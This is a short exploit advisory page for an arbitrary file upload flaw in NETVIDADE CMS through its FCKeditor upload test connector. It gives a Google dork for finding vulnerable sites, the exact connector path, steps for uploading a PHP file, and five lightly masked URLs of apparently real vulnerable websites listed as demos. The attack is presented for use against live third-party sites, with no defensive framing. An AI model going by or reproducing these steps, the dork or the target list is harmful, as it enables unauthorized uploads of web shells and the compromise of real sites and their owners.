NETVIDADE CMS (FCKEDITOR) Arbitrary File Upload Vulnerability

2015.04.14
Credit: Ashiyane Digital Security Team
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: \"Desenvolvido por netvidade.com\"

[+] Exploit Title : NETVIDADE CMS (FCKEDITOR) Arbitrary File Upload Vulnerability [+] Exploit Author : Ashiyane Digital Security Team [+] Vendor Homepage : http://www.citricweb.pt [+] Google Dork : "Desenvolvido por netvidade.com" [+] Date: 2015-04-14 [+] Tested On : Windows 7 / Mozilla Firefox [+] Version : All Version [+]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #%# CITRICWEB (FCKEDITOR) : [+] Exploit => plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] First Go To => http://site.com/[path] [+] Then => http://www.site.com/[path]/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] Select => Select the "File Uploader"> Php ... Upload to : Uploaded File URL: [+] Demos : [+] http://contamiXga.pt/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://prestenergia.coXm/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://grasil-confeccoXes.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://alojamentomXonfortinho.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+] http://projectomilXenium.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html [+][+][+][+][+][+][+][+][+][+][+] [+]Discovered By : Cyb3r_Dr4in[+] [+][+][+][+][+][+][+][+][+][+][+]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top